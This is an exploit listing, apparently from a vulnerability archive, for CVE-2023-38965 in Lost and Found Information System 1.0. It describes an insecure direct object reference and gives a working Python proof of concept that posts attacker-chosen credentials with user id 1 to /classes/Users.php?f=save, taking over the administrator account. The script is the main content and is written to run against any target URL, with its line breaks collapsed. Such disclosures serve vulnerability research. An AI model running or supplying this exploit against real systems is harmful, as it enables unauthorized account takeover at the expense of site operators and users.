Headline
Lost And Found Information System 1.0 Insecure Direct Object Reference
Lost and Found Information System version 1.0 suffers from an insecure direct object reference vulnerability that allows for account takeover.
# Exploit Title: Lost and Found Information System v1.0 - idor leads to Account Take over # Date: 2023-12-03# Exploit Author: OR4NG.M4N# Category : webapps# CVE : CVE-2023-38965Python p0c :import argparseimport requestsimport timeparser = argparse.ArgumentParser(description='Send a POST request to the target server')parser.add_argument('-url', help='URL of the target', required=True)parser.add_argument('-user', help='Username', required=True)parser.add_argument('-password', help='Password', required=True)args = parser.parse_args()url = args.url + '/classes/Users.php?f=save'data = { 'id': '1', 'firstname': 'or4ng', 'middlename': '', 'lastname': 'Admin', 'username': args.user, 'password': args.password}response = requests.post(url, data)if b"1" in response.content: print("Exploit ..") time.sleep(1) print("User :" + args.user + "\nPassword :" + args.password)else: print("Exploit Failed..")Related news
CVE-2023-38965: vulnreability-code-review-php/Lost and Found Information System v1.0.txt at main · Or4ngm4n/vulnreability-code-review-php
Lost and Found Information System 1.0 allows account takeover via username and password to a /classes/Users.php?f=save URI.